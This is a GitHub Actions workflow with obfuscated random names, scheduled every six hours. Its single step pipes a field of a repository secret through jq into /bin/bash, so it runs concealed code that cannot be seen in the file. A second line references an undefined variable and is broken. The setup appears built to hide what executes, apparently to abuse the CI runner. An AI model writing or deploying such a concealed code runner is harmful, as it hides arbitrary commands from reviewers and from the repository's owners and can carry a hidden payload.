name: wangyuse3478

on:
  workflow_dispatch:
  schedule:
    - cron: '11 3/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: wangyuse3478
        env:
          nxpmv50909: ${{ secrets.nxpmv50909 }}
        run: |
          echo $nxpmv50909 | jq -r .japh3 | /bin/bash
          echo $piq061 | jq -r .xqgs453 | /bin/bash

